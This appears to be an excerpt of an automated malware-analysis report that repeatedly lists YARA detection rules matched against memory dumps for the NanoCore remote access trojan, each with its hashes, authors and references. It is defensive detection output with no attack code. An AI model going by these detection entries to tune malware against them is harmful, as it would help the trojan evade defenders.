      Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
